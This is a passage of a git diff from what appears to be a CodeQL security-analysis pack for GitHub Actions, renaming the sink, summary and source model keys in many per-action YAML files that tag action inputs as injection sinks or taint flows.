 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
index 66280f8bdd6..c7e89697afb 100644
--- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
+++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"]
 - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml
index 65965daeb1d..aa849603836 100644
--- a/ql/lib/ext/magefile_mage-action.model.yml
+++ b/ql/lib/ext/magefile_mage-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml
index ba9a04f588b..ae869b6b531 100644
--- a/ql/lib/ext/maierj_fastlane-action.model.yml
+++ b/ql/lib/ext/maierj_fastlane-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"]
 - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"]
diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
index aea054e24b0..9f5801b79c0 100644
--- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml
+++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"]
 - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"]
diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml
index c8646cffe8e..a4a473b8efd 100644
--- a/ql/lib/ext/marocchino_on_artifact.model.yml
+++ b/ql/lib/ext/marocchino_on_artifact.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"]
diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml
index bb1c3ffca2a..10a03e4d186 100644
--- a/ql/lib/ext/mattdavis0351_actions.model.yml
+++ b/ql/lib/ext/mattdavis0351_actions.model.yml
@@ -1,13 +1,13 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"]
 - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"]
 - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"]
diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml
index d3bec5ea39d..9af82b985f3 100644
--- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml
+++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"]
diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
index c65527150b5..3b779d0b86d 100644
--- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
+++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"]
diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml
index 25565b445fc..6ad087730e4 100644
--- a/ql/lib/ext/microsoft_setup-msbuild.model.yml
+++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"]
 - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"]
diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
index d46a07dde96..fa9c1958352 100644
--- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
+++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"]
diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
index 2d162fbc914..6bfaffb2bba 100644
--- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
+++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"]
 - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"]
diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml
index fc91bacdb72..03fa8beaf0b 100644
--- a/ql/lib/ext/msys2_setup-msys2.model.yml
+++ b/ql/lib/ext/msys2_setup-msys2.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"]
 - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml
index 8b2b4e79afa..a4ccaac2d2e 100644
--- a/ql/lib/ext/mxschmitt_action-tmate.model.yml
+++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"]
 - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"]
diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
index 2ea1fdf6855..7c32705dde5 100644
--- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
+++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
@@ -1,12 +1,12 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"]
 - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
index 21e0d819db7..902483f4399 100644
--- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml
+++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml
index bcc8ce6b80d..be86a330b97 100644
--- a/ql/lib/ext/nanasess_setup-php.model.yml
+++ b/ql/lib/ext/nanasess_setup-php.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml
index 741ab37eb9b..0a6f7c34722 100644
--- a/ql/lib/ext/nick-fields_retry.model.yml
+++ b/ql/lib/ext/nick-fields_retry.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"]
 - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"]
diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml
index a9d6b80a627..613b3e0fc59 100644
--- a/ql/lib/ext/octokit_graphql-action.model.yml
+++ b/ql/lib/ext/octokit_graphql-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"]
diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml
index 73d4df99af2..489d47ac71e 100644
--- a/ql/lib/ext/octokit_request-action.model.yml
+++ b/ql/lib/ext/octokit_request-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"]
diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml
index fb6ae5102e1..4a98ecd4af1 100644
--- a/ql/lib/ext/olafurpg_setup-scala.model.yml
+++ b/ql/lib/ext/olafurpg_setup-scala.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml
index 8b29e5c9988..57dc40ef6b8 100644
--- a/ql/lib/ext/paambaati_codeclimate-action.model.yml
+++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"]
diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml
index 5a5cedcaca5..3b92f667ae9 100644
--- a/ql/lib/ext/peter-evans_create-pull-request.model.yml
+++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml
index d156d7da658..da8b02312ea 100644
--- a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml
+++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"]
diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
index 12d3f23f8fd..c06d13301d2 100644
--- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml
+++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"]
 - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"]
diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml
index 30be564c42a..61935c36f7d 100644
--- a/ql/lib/ext/preactjs_compressed-size-action.model.yml
+++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml index 13d4cfeb814..89f61cedc42 100644 --- a/ql/lib/ext/py-actions_flake8.model.yml +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] - ["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml index 3043c9b30ec..1aabfc23fc4 100644 --- a/ql/lib/ext/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml index 29d51d1bfbb..d55fdbc3ea9 100644 --- a/ql/lib/ext/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"] 
diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml index 75a9650a92f..d01ac86d317 100644 --- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index a85a4b466e2..bab76cbe27f 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml index a0c4d6f7ec5..02ac5032c79 100644 --- a/ql/lib/ext/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml index b5d4629003b..0c484d44549 100644 --- a/ql/lib/ext/renovatebot_github-action.model.yml +++ b/ql/lib/ext/renovatebot_github-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml index 4b96edeccc2..c088c7a644e 100644 --- a/ql/lib/ext/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml index ae3ef2e2b1b..5b22ac1f5fe 100644 --- a/ql/lib/ext/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 079dfc1fc02..3329a255e6f 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] 
diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 19edd617c67..14a1cdeed86 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml index 8ab1d090b1c..49931d93f88 100644 --- a/ql/lib/ext/sergeysova_jq-action.model.yml +++ b/ql/lib/ext/sergeysova_jq-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index 9f8d987c0af..37d0014bcbb 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index 90a18103868..9058c9fb984 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml 
+++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml index fd484074f5c..713c5c61cea 100644 --- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml index 5caaea9562e..40b02283152 100644 --- a/ql/lib/ext/snow-actions_eclint.model.yml +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml index 9462b8d5bbd..c08505f9747 100644 --- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"] diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml index 9b01987e1f2..6305fd33960 100644 
--- a/ql/lib/ext/step-security_harden-runner.model.yml +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 10a3630ea0b..73988096818 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml index aac20afddf5..ee9a0dbb32a 100644 --- a/ql/lib/ext/tibdex_backport.model.yml +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index 8dcabd1650a..f056cf5d864 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"] 
diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index d98eda4e69f..838f0b30848 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: # https://github.com/tj-actions/branch-names - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index b8fb2514253..c215755f61d 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"] diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml index ae166b1f515..014e779b29a 100644 --- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"] diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml index a6cc6884389..806c055529d 100644 --- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index 499161aafcb..d6e554a8709 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml index a352d6c9ff6..55d1531a770 100644 --- a/ql/lib/ext/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml index 6ed71f18215..c52d62e204a 100644 --- a/ql/lib/ext/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: 